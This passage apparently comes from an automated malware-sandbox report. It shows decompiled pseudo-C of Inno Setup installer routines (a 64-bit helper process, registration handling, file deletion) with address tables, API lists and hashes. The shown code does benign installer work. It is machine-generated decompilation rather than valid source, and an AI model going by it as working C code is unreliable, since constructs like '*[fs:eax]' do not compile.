				E004244F8(L"helper %d 0x%x", 1,  &_v176,  &_v160);
				_t97 = E0040B278(_v160);
				_t98 =  *0x6d6368; // 0x0
				if(CreateProcessW(E0040B278(_t98), _t97, 0, 0, 0xffffffff, 0xc000000, 0, _t91,  &_v96,  &_v112) == 0) {
					E0060CE84(L"CreateProcess");
				}
				 *((char*)(_t127 + 4)) = 1;
				 *((char*)(_t127 + 5)) = 0;
				 *(_t127 + 8) = _v112.hProcess;
				 *((intOrPtr*)(_t127 + 0x10)) = _v112.dwProcessId;
				 *((intOrPtr*)(_t127 + 0xc)) = _v20;
				_v20 = 0;
				CloseHandle(_v112.hThread);
				_v184 =  *((intOrPtr*)(_t127 + 0x10));
				_v180 = 0;
				E006163B4(L"Helper process PID: %u", _t127, 0,  &_v184, _t141, 0x6d636c);
				_pop(_t139);
				 *[fs:eax] = _t139;
				_push(E00625A01);
				return CloseHandle(_v24);
			}






































                                                            0x00625755
                                                            0x00625757
                                                            0x00625762
                                                            0x00625768
                                                            0x0062576e
                                                            0x00625771
                                                            0x00625778
                                                            0x0062577d
                                                            0x0062577e
                                                            0x00625783
                                                            0x00625786
                                                            0x0062578e
                                                            0x00625793
                                                            0x0062579b
                                                            0x006257a2
                                                            0x006257a2
                                                            0x006257ae
                                                            0x006257b5
                                                            0x006257b5
                                                            0x006257ba
                                                            0x006257ba
                                                            0x006257c1
                                                            0x006257cc
                                                            0x006257cf
                                                            0x006257cf
                                                            0x006257dd
                                                            0x006257e3
                                                            0x006257ec
                                                            0x006257f2
                                                            0x006257fc
                                                            0x00625802
                                                            0x00625809
                                                            0x0062580c
                                                            0x00625812
                                                            0x00625815
                                                            0x00625829
                                                            0x00625853
                                                            0x0062585a
                                                            0x00000000
                                                            0x00000000
                                                            0x00625866
                                                            0x00625871
                                                            0x00625871
                                                            0x00625866
                                                            0x0062587d
                                                            0x0062587e
                                                            0x00625883
                                                            0x00625886
                                                            0x006258a9
                                                            0x006258b0
                                                            0x006258b7
                                                            0x006258b7
                                                            0x006258be
                                                            0x006258bf
                                                            0x006258c4
                                                            0x006258c7
                                                            0x006258ca
                                                            0x006258e4
                                                            0x006258eb
                                                            0x006258eb
                                                            0x006258fa
                                                            0x006258ff
                                                            0x00625914
                                                            0x0062591f
                                                            0x00625939
                                                            0x00625943
                                                            0x0062594d
                                                            0x00625953
                                                            0x0062596a
                                                            0x00625975
                                                            0x0062597b
                                                            0x0062598d
                                                            0x00625994
                                                            0x00625994
                                                            0x00625999
                                                            0x0062599d
                                                            0x006259a4
                                                            0x006259aa
                                                            0x006259b0
                                                            0x006259b5
                                                            0x006259bc
                                                            0x006259c4
                                                            0x006259ca
                                                            0x006259de
                                                            0x006259e5
                                                            0x006259e8
                                                            0x006259eb
                                                            0x006259f9

                                                            APIs
                                                            • GetTickCount.KERNEL32 ref: 006257BC
                                                            • QueryPerformanceCounter.KERNEL32(00000000,00000000,00625A4F,?,?,00000000,00000000,?,0062644E,?,00000000,00000000), ref: 006257C5
                                                            • GetSystemTimeAsFileTime.KERNEL32(00000000,00000000,00000000,40080003,00000006,00000001,00002000,00002000,00000000,00000000), ref: 006257CF
                                                            • GetCurrentProcessId.KERNEL32(?,00000000,00000000,00625A4F,?,?,00000000,00000000,?,0062644E,?,00000000,00000000), ref: 006257D8
                                                            • CreateNamedPipeW.KERNEL32(00000000,40080003,00000006,00000001,00002000,00002000,00000000,00000000), ref: 0062584E
                                                            • GetLastError.KERNEL32(00000000,40080003,00000006,00000001,00002000,00002000,00000000,00000000), ref: 0062585C
                                                            • CreateFileW.KERNEL32(00000000,C0000000,00000000,006CD098,00000003,00000000,00000000,00000000,00625A0B,?,00000000,40080003,00000006,00000001,00002000,00002000), ref: 006258A4
                                                            • SetNamedPipeHandleState.KERNEL32(000000FF,00000002,00000000,00000000,00000000,006259FA,?,00000000,C0000000,00000000,006CD098,00000003,00000000,00000000,00000000,00625A0B), ref: 006258DD
                                                              • Part of subcall function 005C745C: GetSystemDirectoryW.KERNEL32(?,00000104), ref: 005C746F
                                                            • CreateProcessW.KERNEL32 ref: 00625986
                                                            • CloseHandle.KERNEL32(?,00000000,00000000,?,00000000,00000000,000000FF,0C000000,00000000,00000000,00000044,?,000000FF,00000002,00000000,00000000), ref: 006259BC
                                                            • CloseHandle.KERNEL32(000000FF,00625A01,?,00000000,00000000,000000FF,0C000000,00000000,00000000,00000044,?,000000FF,00000002,00000000,00000000,00000000), ref: 006259F4
                                                              • Part of subcall function 0060CE84: GetLastError.KERNEL32(00000000,0060DBAA,00000005,00000000,0060DBD2,?,?,006D579C,?,00000000,00000000,00000000,?,006B910F,00000000,006B912A), ref: 0060CE87
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000006.00000002.317730068.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000006.00000002.317725489.0000000000400000.00000002.00020000.sdmp Download File
                                                            • Associated: 00000006.00000002.318066673.00000000006C5000.00000004.00020000.sdmp Download File
                                                            • Associated: 00000006.00000002.318073516.00000000006CA000.00000008.00020000.sdmp Download File
                                                            • Associated: 00000006.00000002.318079756.00000000006CC000.00000004.00020000.sdmp Download File
                                                            • Associated: 00000006.00000002.318085304.00000000006CE000.00000008.00020000.sdmp Download File
                                                            • Associated: 00000006.00000002.318091437.00000000006CF000.00000004.00020000.sdmp Download File
                                                            • Associated: 00000006.00000002.318097233.00000000006D4000.00000004.00020000.sdmp Download File
                                                            • Associated: 00000006.00000002.318107258.00000000006D9000.00000008.00020000.sdmp Download File
                                                            • Associated: 00000006.00000002.318112284.00000000006DB000.00000004.00020000.sdmp Download File
                                                            • Associated: 00000006.00000002.318118585.00000000006DC000.00000002.00020000.sdmp Download File
                                                            • Associated: 00000006.00000002.318123129.00000000006DE000.00000002.00020000.sdmp Download File
                                                            Similarity
                                                            • API ID: CreateHandle$CloseErrorFileLastNamedPipeProcessSystemTime$CountCounterCurrentDirectoryPerformanceQueryStateTick
                                                            • String ID: 64-bit helper EXE wasn't extracted$Cannot utilize 64-bit features on this version of Windows$CreateFile$CreateNamedPipe$CreateProcess$D$Helper process PID: %u$SetNamedPipeHandleState$Starting 64-bit helper process.$\\.\pipe\InnoSetup64BitHelper-%.8x-%.8x-%.8x-%.8x%.8x$helper %d 0x%x$i
                                                            • API String ID: 770386003-3271284199
                                                            • Opcode ID: 4b38d71f613c2805a895e8b5dd9c39005fd96be071beebf230027e2823365f0d
                                                            • Instruction ID: 34d3d620ae4a6a58b4d890a55742d975a8112a0372845dc610fa96f79e58b5cb
                                                            • Opcode Fuzzy Hash: 4b38d71f613c2805a895e8b5dd9c39005fd96be071beebf230027e2823365f0d
                                                            • Instruction Fuzzy Hash: 21717F70E407589EDB20EFB9DC46B9EBBB6EF09304F1041A9F509EB282D77499408F65
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 006B9138, Relevance: 24.8, APIs: 6, Strings: 8, Instructions: 260COMMON
                                                            Download Yara Rule
                                                            C-Code - Quality: 73%
                                                            			E006B9138(char __ebx, void* __edi, void* __esi, void* __fp0) {
				char _v8;
				char _v12;
				void* _v16;
				char _v20;
				char _v21;
				signed int _v22;
				void* _v28;
				intOrPtr _v32;
				char _v36;
				char _v40;
				char _v44;
				char _v48;
				char _v60;
				void* _t62;
				signed int _t110;
				intOrPtr _t129;
				signed int _t130;
				char _t134;
				char _t139;
				char _t142;
				char* _t149;
				intOrPtr* _t158;
				void* _t159;
				intOrPtr _t181;
				intOrPtr _t189;
				intOrPtr _t190;
				intOrPtr _t192;
				intOrPtr _t196;
				intOrPtr _t199;
				intOrPtr* _t204;
				intOrPtr _t206;
				intOrPtr _t207;
				void* _t216;

				_t216 = __fp0;
				_t202 = __edi;
				_t157 = __ebx;
				_t206 = _t207;
				_t159 = 7;
				do {
					_push(0);
					_push(0);
					_t159 = _t159 - 1;
				} while (_t159 != 0);
				_push(__ebx);
				_push(__edi);
				_t204 =  *0x6cdec4; // 0x6d579c
				_push(_t206);
				_push(0x6b94fd);
				_push( *[fs:eax]);
				 *[fs:eax] = _t207;
				E005C6FB0(1, __ebx,  &_v36, __edi, _t204);
				_t62 = E00422368(_v36, _t159, L"/REG");
				_t209 = _t62;
				if(_t62 != 0) {
					E005C6FB0(1, __ebx,  &_v40, __edi, _t204);
					__eflags = E00422368(_v40, _t159, L"/REGU");
					if(__eflags != 0) {
						__eflags = 0;
						_pop(_t181);
						 *[fs:eax] = _t181;
						_push(E006B9504);
						E0040A228( &_v60, 7);
						return E0040A228( &_v20, 4);
					} else {
						_v21 = 0;
						goto L6;
					}
				} else {
					_v21 = 1;
					L6:
					E005B8250( *_t204, L"Setup", _t209);
					ShowWindow( *( *_t204 + 0x188), 5);
					E006AF824();
					_v28 = E00413E90(0, 0, L"Inno-Setup-RegSvr-Mutex");
					ShowWindow( *( *_t204 + 0x188), 0);
					if(_v28 != 0) {
						do {
							E005B8704( *_t204);
						} while (MsgWaitForMultipleObjects(1,  &_v28, 0, 0xffffffff, 0x4ff) == 1);
					}
					ShowWindow( *( *_t204 + 0x188), 5);
					_push(_t206);
					_push(0x6b94ce);
					_push( *[fs:eax]);
					 *[fs:eax] = _t207;
					E005C6FB0(0, _t157,  &_v44, _t202, _t204);
					E005C4F90(_v44, _t157,  &_v8, L".msg", _t202, _t204);
					E005C6FB0(0, _t157,  &_v48, _t202, _t204);
					E005C4F90(_v48, _t157,  &_v12, L".lst", _t202, _t204);
					if(E005C685C(_v12) == 0) {
						E00423A20(_v12);
						E00423A20(_v8);
						_push(_t206);
						_push( *[fs:eax]);
						 *[fs:eax] = _t207;
						E006B9098(_t157,  &_v12, _t202, _t204, __eflags);
						_pop(_t189);
						 *[fs:eax] = _t189;
						_t190 = 0x6b949e;
						 *[fs:eax] = _t190;
						_push(E006B94D5);
						__eflags = _v28;
						if(_v28 != 0) {
							ReleaseMutex(_v28);
							return CloseHandle(_v28);
						}
						return 0;
					} else {
						E005CD6BC(_v8, _t157, 1, 0, _t202, _t204);
						_t110 =  *0x6cddd0; // 0x6d603c
						E005C9044(_t110 & 0xffffff00 | ( *(_t110 + 0x4c) & 0x00000001) != 0x00000000);
						_t192 =  *0x6cded8; // 0x6d5c28
						_t26 = _t192 + 0x2f8; // 0x0
						E005B8250( *_t204,  *_t26,  *(_t110 + 0x4c) & 0x00000001);
						_push(_t206);
						_push(0x6b946a);
						_push( *[fs:eax]);
						 *[fs:eax] = _t207;
						E006AC8CC(_t157,  *_t26, _t202, _t204);
						_v32 = E005CBFB8(1, 1, 0, 2);
						_push(_t206);
						_push(0x6b9450);
						_push( *[fs:eax]);
						 *[fs:eax] = _t207;
						while(E005CC258(_v32) == 0) {
							E005CC268(_v32, _t157,  &_v16, _t202, _t204, __eflags);
							_t157 = _v16;
							__eflags = _t157;
							if(_t157 != 0) {
								_t158 = _t157 - 4;
								__eflags = _t158;
								_t157 =  *_t158;
							}
							__eflags = _t157 - 4;
							if(__eflags > 0) {
								__eflags =  *_v16 - 0x5b;
								if(__eflags == 0) {
									__eflags =  *((short*)(_v16 + 6)) - 0x5d;
									if(__eflags == 0) {
										E0040B698(_v16, 0x7fffffff, 5,  &_v20);
										_t129 = _v16;
										__eflags =  *((short*)(_t129 + 4)) - 0x71;
										if( *((short*)(_t129 + 4)) == 0x71) {
											L19:
											_t130 = 1;
										} else {
											__eflags = _v21;
											if(_v21 == 0) {
												L18:
												_t130 = 0;
											} else {
												_t149 =  *0x6cdcc4; // 0x6d67df
												__eflags =  *_t149;
												if( *_t149 == 0) {
													goto L19;
												} else {
													goto L18;
												}
											}
										}
										_v22 = _t130;
										_push(_t206);
										_push(0x6b93c5);
										_push( *[fs:eax]);
										 *[fs:eax] = _t207;
										_t134 = ( *(_v16 + 2) & 0x0000ffff) - 0x53;
										__eflags = _t134;
										if(_t134 == 0) {
											_push(_v22 & 0x000000ff);
											E00624E78(0, _t157, _v20, 1, _t202, _t204, _t216);
										} else {
											_t139 = _t134 - 1;
											__eflags = _t139;
											if(_t139 == 0) {
												__eflags = 0;
												E006255F0(0, _t157, _v20, _t204, 0, _t216);
											} else {
												_t142 = _t139 - 0x1f;
												__eflags = _t142;
												if(_t142 == 0) {
													_push(_v22 & 0x000000ff);
													E00624E78(0, _t157, _v20, 0, _t202, _t204, _t216);
												} else {
													__eflags = _t142 - 1;
													if(__eflags == 0) {
														E0062460C(_v20, _t157, _t204);
													}
												}
											}
										}
										_pop(_t199);
										 *[fs:eax] = _t199;
									}
								}
							}
						}
						_pop(_t196);
						 *[fs:eax] = _t196;
						_push(E006B9457);
						return E00408444(_v32);
					}
				}
			}




































                                                            0x006b9138
                                                            0x006b9138
                                                            0x006b9138
                                                            0x006b9139
                                                            0x006b913b
                                                            0x006b9140
                                                            0x006b9140
                                                            0x006b9142
                                                            0x006b9144
                                                            0x006b9144
                                                            0x006b9147
                                                            0x006b9149
                                                            0x006b914a
                                                            0x006b9152
                                                            0x006b9153
                                                            0x006b9158
                                                            0x006b915b
                                                            0x006b9166
                                                            0x006b9173
                                                            0x006b9178
                                                            0x006b917a
                                                            0x006b918a
                                                            0x006b919c
                                                            0x006b919e
                                                            0x006b94d5
                                                            0x006b94d7
                                                            0x006b94da
                                                            0x006b94dd
                                                            0x006b94ea
                                                            0x006b94fc
                                                            0x006b91a4
                                                            0x006b91a4
                                                            0x00000000
                                                            0x006b91a4
                                                            0x006b917c
                                                            0x006b917c
                                                            0x006b91a8
                                                            0x006b91af
                                                            0x006b91bf
                                                            0x006b91c4
                                                            0x006b91d7
                                                            0x006b91e5
                                                            0x006b91ee
                                                            0x006b91f0
                                                            0x006b91f2
                                                            0x006b920b
                                                            0x006b91f0
                                                            0x006b921b
                                                            0x006b9222
                                                            0x006b9223
                                                            0x006b9228
                                                            0x006b922b
                                                            0x006b9233
                                                            0x006b9243
                                                            0x006b924d
                                                            0x006b925d
                                                            0x006b926c
                                                            0x006b9474
                                                            0x006b947c
                                                            0x006b9483
                                                            0x006b9489
                                                            0x006b948c
                                                            0x006b948f
                                                            0x006b9496
                                                            0x006b9499
                                                            0x006b94aa
                                                            0x006b94ad
                                                            0x006b94b0
                                                            0x006b94b5
                                                            0x006b94b9
                                                            0x006b94bf
                                                            0x00000000
                                                            0x006b94c8
                                                            0x006b94cd
                                                            0x006b9272
                                                            0x006b9279
                                                            0x006b927e
                                                            0x006b928a
                                                            0x006b928f
                                                            0x006b9295
                                                            0x006b929d
                                                            0x006b92a4
                                                            0x006b92a5
                                                            0x006b92aa
                                                            0x006b92ad
                                                            0x006b92b0
                                                            0x006b92ca
                                                            0x006b92cf
                                                            0x006b92d0
                                                            0x006b92d5
                                                            0x006b92d8
                                                            0x006b942a
                                                            0x006b92e6
                                                            0x006b92eb
                                                            0x006b92ee
                                                            0x006b92f0
                                                            0x006b92f2
                                                            0x006b92f2
                                                            0x006b92f5
                                                            0x006b92f5
                                                            0x006b92f7
                                                            0x006b92fa
                                                            0x006b9303
                                                            0x006b9307
                                                            0x006b9310
                                                            0x006b9315
                                                            0x006b932c
                                                            0x006b9331
                                                            0x006b9334
                                                            0x006b9339
                                                            0x006b934f
                                                            0x006b934f
                                                            0x006b933b
                                                            0x006b933b
                                                            0x006b933f
                                                            0x006b934b
                                                            0x006b934b
                                                            0x006b9341
                                                            0x006b9341
                                                            0x006b9346
                                                            0x006b9349
                                                            0x00000000
                                                            0x00000000
                                                            0x00000000
                                                            0x00000000
                                                            0x006b9349
                                                            0x006b933f
                                                            0x006b9351
                                                            0x006b9356
                                                            0x006b9357
                                                            0x006b935c
                                                            0x006b935f
                                                            0x006b9369
                                                            0x006b9369
                                                            0x006b936d
                                                            0x006b9398
                                                            0x006b93a0
                                                            0x006b936f
                                                            0x006b936f
                                                            0x006b936f
                                                            0x006b9372
                                                            0x006b93b4
                                                            0x006b93b6
                                                            0x006b9374
                                                            0x006b9374
                                                            0x006b9374
                                                            0x006b9378
                                                            0x006b9385
                                                            0x006b938d
                                                            0x006b937a
                                                            0x006b937a
                                                            0x006b937d
                                                            0x006b93aa
                                                            0x006b93aa
                                                            0x006b937d
                                                            0x006b9378
                                                            0x006b9372
                                                            0x006b93bd
                                                            0x006b93c0
                                                            0x006b93c0
                                                            0x006b9315
                                                            0x006b9307
                                                            0x006b92fa
                                                            0x006b943c
                                                            0x006b943f
                                                            0x006b9442
                                                            0x006b944f
                                                            0x006b944f
                                                            0x006b926c

                                                            APIs
                                                            • ShowWindow.USER32(?,00000005,00000000,006B94FD,?,?,00000000,?,00000000,00000000,?,006B99DE,00000000,006B99E8,?,00000000), ref: 006B91BF
                                                            • ShowWindow.USER32(?,00000000,00000000,00000000,Inno-Setup-RegSvr-Mutex,?,00000005,00000000,006B94FD,?,?,00000000,?,00000000,00000000), ref: 006B91E5
                                                            • MsgWaitForMultipleObjects.USER32 ref: 006B9206
                                                            • ShowWindow.USER32(?,00000005,?,00000000,00000000,00000000,Inno-Setup-RegSvr-Mutex,?,00000005,00000000,006B94FD,?,?,00000000,?,00000000), ref: 006B921B
                                                              • Part of subcall function 005C6FB0: GetModuleFileNameW.KERNEL32(00000000,?,00000104,00000000,005C7045,?,?,?,00000001,?,0061037E,00000000,006103E9), ref: 005C6FE5
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000006.00000002.317730068.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000006.00000002.317725489.0000000000400000.00000002.00020000.sdmp Download File
                                                            • Associated: 00000006.00000002.318066673.00000000006C5000.00000004.00020000.sdmp Download File
                                                            • Associated: 00000006.00000002.318073516.00000000006CA000.00000008.00020000.sdmp Download File
                                                            • Associated: 00000006.00000002.318079756.00000000006CC000.00000004.00020000.sdmp Download File
                                                            • Associated: 00000006.00000002.318085304.00000000006CE000.00000008.00020000.sdmp Download File
                                                            • Associated: 00000006.00000002.318091437.00000000006CF000.00000004.00020000.sdmp Download File
                                                            • Associated: 00000006.00000002.318097233.00000000006D4000.00000004.00020000.sdmp Download File
                                                            • Associated: 00000006.00000002.318107258.00000000006D9000.00000008.00020000.sdmp Download File
                                                            • Associated: 00000006.00000002.318112284.00000000006DB000.00000004.00020000.sdmp Download File
                                                            • Associated: 00000006.00000002.318118585.00000000006DC000.00000002.00020000.sdmp Download File
                                                            • Associated: 00000006.00000002.318123129.00000000006DE000.00000002.00020000.sdmp Download File
                                                            Similarity
                                                            • API ID: ShowWindow$FileModuleMultipleNameObjectsWait
                                                            • String ID: (\m$.lst$.msg$/REG$/REGU$<`m$Inno-Setup-RegSvr-Mutex$Setup
                                                            • API String ID: 66301061-906243933
                                                            • Opcode ID: 078cf02edb1222c4bc64e21194ae756c0ceff5465f997aaa320c40601d4a08a6
                                                            • Instruction ID: 4d26cb6eac5053f9cdac576eea358071a92945d2d4b93ba07426bed60c59251a
                                                            • Opcode Fuzzy Hash: 078cf02edb1222c4bc64e21194ae756c0ceff5465f997aaa320c40601d4a08a6
                                                            • Instruction Fuzzy Hash: 9B91D5B0A042059FDB10EBA4D856FEEBBF6FB49304F514469F600A7381DA79AD81CB74
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 00629850, Relevance: 23.0, APIs: 2, Strings: 11, Instructions: 214COMMON
                                                            Download Yara Rule
                                                            C-Code - Quality: 85%
                                                            			E00629850(char __eax, void* __ebx, signed char __edx, void* __edi, void* __esi, void* __fp0, char _a4, char _a8, intOrPtr _a12) {
				char _v5;
				char _v6;
				char _v8;
				char _v12;
				char _v16;
				char _v20;
				char _v24;
				char _v28;
				char _v32;
				char _v36;
				char _v40;
				char _v44;
				char _v48;
				char _v60;
				void* __ecx;
				char _t65;
				void* _t69;
				void* _t112;
				signed char _t135;
				intOrPtr _t137;
				intOrPtr _t164;
				intOrPtr _t178;
				void* _t188;
				signed int _t189;
				char _t191;
				intOrPtr _t193;
				intOrPtr _t194;

				_t210 = __fp0;
				_t187 = __edi;
				_t193 = _t194;
				_t137 = 6;
				do {
					_push(0);
					_push(0);
					_t137 = _t137 - 1;
				} while (_t137 != 0);
				_push(_t137);
				_t1 =  &_v8;
				_t138 =  *_t1;
				 *_t1 = _t137;
				_push(__edi);
				_v5 =  *_t1;
				_t135 = __edx;
				_t191 = __eax;
				_push(_t193);
				_push(0x629b12);
				_push( *[fs:eax]);
				 *[fs:eax] = _t194;
				_v6 = 1;
				E005C53D0(__eax,  &_v12);
				if(E00422368(_v12,  *_t1, L".hlp") != 0) {
					E005C53D0(_t191,  &_v24);
					_t65 = E00422368(_v24, _t138, L".chm");
					__eflags = _t65;
					if(_t65 == 0) {
						E005C4F90(_t191, _t135,  &_v28, L".chw", __edi, _t191);
						__eflags = 0;
						E00629850(_v28, _t135, _t135, __edi, _t191, __fp0, 0, 0, _a12);
						_pop(_t138);
					}
				} else {
					E005C4F90(_t191, _t135,  &_v16, L".gid", __edi, _t191);
					E00629850(_v16, _t135, _t135, __edi, _t191, __fp0, 0, 0, _a12);
					E005C4F90(_t191, _t135,  &_v20, L".fts", __edi, _t191);
					E00629850(_v20, _t135, _t135, _t187, _t191, __fp0, 0, 0, _a12);
					_pop(_t138);
				}
				E005C53D0(_t191,  &_v32);
				_t69 = E00422368(_v32, _t138, L".lnk");
				_t197 = _t69;
				if(_t69 == 0) {
					E00624924(_t191, _t135);
				}
				if(E0060C5F4(_t135, _t191, _t197) == 0) {
					L25:
					_pop(_t164);
					 *[fs:eax] = _t164;
					_push(E00629B19);
					E0040A228( &_v60, 5);
					return E0040A228( &_v32, 6);
				} else {
					_v40 = _t191;
					_v36 = 0x11;
					_t141 = 0;
					E006163B4(L"Deleting file: %s", _t135, 0,  &_v40, _t187, _t191);
					_t199 = _a4;
					if(_a4 != 0) {
						_t189 = E0060C330(_t135, _t191, _t199);
						if(_t189 != 0xffffffff) {
							_t201 = _t189 & 0x00000001;
							if((_t189 & 0x00000001) != 0) {
								_t141 = 0xfffffffe & _t189;
								_t112 = E0060C6DC(_t135, 0xfffffffe & _t189, _t191, _t201);
								_t202 = _t112;
								if(_t112 == 0) {
									E00616130(L"Failed to strip read-only attribute.", _t135, _t189, _t191);
								} else {
									E00616130(L"Stripped read-only attribute.", _t135, _t189, _t191);
								}
							}
						}
					}
					if(E0060C158(_t135, _t191, _t202) != 0) {
						__eflags = _v5;
						if(_v5 != 0) {
							SHChangeNotify(4, 5, E0040B278(_t191), 0);
							E005C5378(_t191, _t141,  &_v60);
							E00610640( *((intOrPtr*)(_a12 - 0x3c)), _t141, _v60, _t210);
						}
						goto L25;
					} else {
						_t188 = GetLastError();
						if(_a8 == 0 ||  *((char*)(_a12 - 0x29)) == 0) {
							L22:
							_v40 = _t188;
							_v36 = 0;
							E006163B4(L"Failed to delete the file; it may be in use (%d).", _t135, 0,  &_v40, _t188, _t191);
							_v6 = 0;
							goto L25;
						} else {
							if(_t188 == 5) {
								L20:
								if((E0060C330(_t135, _t191, _t207) & 0x00000001) != 0) {
									goto L22;
								}
								_v40 = _t188;
								_v36 = 0;
								E006163B4(L"The file appears to be in use (%d). Will delete on restart.", _t135, 0,  &_v40, _t188, _t191);
								_push(_t193);
								 *[fs:eax] = _t194;
								E0060D8B0(_t135, _t135, _t191, _t188, _t191);
								 *((char*)( *((intOrPtr*)(_a12 - 0x30)) + 0x1c)) = 1;
								E005C52C8(_t191,  &_v48, _t193,  *[fs:eax]);
								E005C5378(_v48, 0,  &_v44);
								E00610640( *((intOrPtr*)(_a12 + (_t135 & 0x000000ff) * 4 - 0x38)), _a12, _v44, _t210);
								_t178 = 0x629a6d;
								 *[fs:eax] = _t178;
								goto L25;
							}
							_t207 = _t188 - 0x20;
							if(_t188 != 0x20) {
								goto L22;
							}
							goto L20;
						}
					}
				}
			}






























                                                            0x00629850
                                                            0x00629850
                                                            0x00629851
                                                            0x00629854
                                                            0x00629859
                                                            0x00629859
                                                            0x0062985b
                                                            0x0062985d
                                                            0x0062985d
                                                            0x00629860
                                                            0x00629861
                                                            0x00629861
                                                            0x00629861
                                                            0x00629866
                                                            0x00629867
                                                            0x0062986a
                                                            0x0062986c
                                                            0x00629870
                                                            0x00629871
                                                            0x00629876
                                                            0x00629879
                                                            0x0062987c
                                                            0x00629885
                                                            0x00629899
                                                            0x006298ea
                                                            0x006298f7
                                                            0x006298fc
                                                            0x006298fe
                                                            0x00629912
                                                            0x0062991a
                                                            0x0062991e
                                                            0x00629923
                                                            0x00629923
                                                            0x0062989b
                                                            0x006298ad
                                                            0x006298b9
                                                            0x006298d1
                                                            0x006298dd
                                                            0x006298e2
                                                            0x006298e2
                                                            0x00629929
                                                            0x00629936
                                                            0x0062993b
                                                            0x0062993d
                                                            0x00629941
                                                            0x00629941
                                                            0x00629951
                                                            0x00629aea
                                                            0x00629aec
                                                            0x00629aef
                                                            0x00629af2
                                                            0x00629aff
                                                            0x00629b11
                                                            0x00629957
                                                            0x00629957
                                                            0x0062995a
                                                            0x00629961
                                                            0x00629968
                                                            0x0062996d
                                                            0x00629971
                                                            0x0062997c
                                                            0x00629981
                                                            0x00629983
                                                            0x00629989
                                                            0x00629990
                                                            0x00629996
                                                            0x0062999b
                                                            0x0062999d
                                                            0x006299b0
                                                            0x0062999f
                                                            0x006299a4
                                                            0x006299a4
                                                            0x0062999d
                                                            0x00629989
                                                            0x00629981
                                                            0x006299c0
                                                            0x00629ab9
                                                            0x00629abd
                                                            0x00629acd
                                                            0x00629ad7
                                                            0x00629ae5
                                                            0x00629ae5
                                                            0x00000000
                                                            0x006299c6
                                                            0x006299cb
                                                            0x006299d1
                                                            0x00629a9d
                                                            0x00629a9d
                                                            0x00629aa0
                                                            0x00629aae
                                                            0x00629ab3
                                                            0x00000000
                                                            0x006299e4
                                                            0x006299e7
                                                            0x006299f2
                                                            0x006299fd
                                                            0x00000000
                                                            0x00000000
                                                            0x00629a03
                                                            0x00629a06
                                                            0x00629a14
                                                            0x00629a1b
                                                            0x00629a24
                                                            0x00629a2d
                                                            0x00629a38
                                                            0x00629a41
                                                            0x00629a4c
                                                            0x00629a5e
                                                            0x00629a65
                                                            0x00629a68
                                                            0x00000000
                                                            0x00629a68
                                                            0x006299e9
                                                            0x006299ec
                                                            0x00000000
                                                            0x00000000
                                                            0x00000000
                                                            0x006299ec
                                                            0x006299d1
                                                            0x006299c0

                                                            APIs
                                                            • GetLastError.KERNEL32(00000000,00629B12,?,?,?,?,00000005,00000000,00000000,?,?,0062AF86,00000000,00000000,?,00000000), ref: 006299C6
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000006.00000002.317730068.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000006.00000002.317725489.0000000000400000.00000002.00020000.sdmp Download File
                                                            • Associated: 00000006.00000002.318066673.00000000006C5000.00000004.00020000.sdmp Download File
                                                            • Associated: 00000006.00000002.318073516.00000000006CA000.00000008.00020000.sdmp Download File
                                                            • Associated: 00000006.00000002.318079756.00000000006CC000.00000004.00020000.sdmp Download File
                                                            • Associated: 00000006.00000002.318085304.00000000006CE000.00000008.00020000.sdmp Download File
                                                            • Associated: 00000006.00000002.318091437.00000000006CF000.00000004.00020000.sdmp Download File
                                                            • Associated: 00000006.00000002.318097233.00000000006D4000.00000004.00020000.sdmp Download File
                                                            • Associated: 00000006.00000002.318107258.00000000006D9000.00000008.00020000.sdmp Download File
                                                            • Associated: 00000006.00000002.318112284.00000000006DB000.00000004.00020000.sdmp Download File
                                                            • Associated: 00000006.00000002.318118585.00000000006DC000.00000002.00020000.sdmp Download File
                                                            • Associated: 00000006.00000002.318123129.00000000006DE000.00000002.00020000.sdmp Download File
                                                            Similarity
                                                            • API ID: ErrorLast
                                                            • String ID: .chm$.chw$.fts$.gid$.hlp$.lnk$Deleting file: %s$Failed to delete the file; it may be in use (%d).$Failed to strip read-only attribute.$Stripped read-only attribute.$The file appears to be in use (%d). Will delete on restart.
                                                            • API String ID: 1452528299-3112430753
                                                            • Opcode ID: e86b536b56413c09e9305a1eb6eef416c5ea9b69f8604097457debdc0e62690a
                                                            • Instruction ID: 80e8b6ab9e5d3a552657306fa088f7fa642ecff14c11c84625059ee943e1d250
                                                            • Opcode Fuzzy Hash: e86b536b56413c09e9305a1eb6eef416c5ea9b69f8604097457debdc0e62690a
                                                            • Instruction Fuzzy Hash: D371E330B00B245FDB04EF68E851BEE77A6AF89710F14842DF801A7381DAB89D45CB79
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 0060E4D8, Relevance: 19.5, APIs: 7, Strings: 4, Instructions: 253registryCOMMON
                                                            Download Yara Rule
                                                            C-Code - Quality: 73%
                                                            			E0060E4D8(void* __ebx, intOrPtr __edx, void* __edi, void* __esi, void* __eflags) {
				char _v8;
				intOrPtr _v12;
				char _v13;
				void* _v20;
				char _v21;
				char _v28;
				int _v32;
				int _v36;
				char _v40;
				char _v44;
				char* _v48;
				char _v52;
				char _v56;
				char _v60;
				intOrPtr _v64;
				intOrPtr _v68;
				char* _v72;
				char _v76;
				char _v80;
				void* _t77;
				char _t98;
				char _t103;
				char* _t110;
				char _t133;
				char _t139;
				char _t144;
				void* _t168;
				short* _t169;
				char _t170;
				char _t172;
				intOrPtr _t189;
				intOrPtr _t194;
				intOrPtr _t196;
				void* _t207;
				void* _t208;
				intOrPtr _t209;

				_t207 = _t208;
				_t209 = _t208 + 0xffffffb4;
				_push(__esi);
				_push(__edi);
				_v40 = 0;
				_v44 = 0;
				_v60 = 0;
				_v76 = 0;
				_v80 = 0;
				_v56 = 0;
				_v8 = 0;
				_v12 = __edx;
				_push(_t207);
				_push(0x60e7be);
				_push( *[fs:edx]);
				 *[fs:edx] = _t209;
				_v13 = 0;
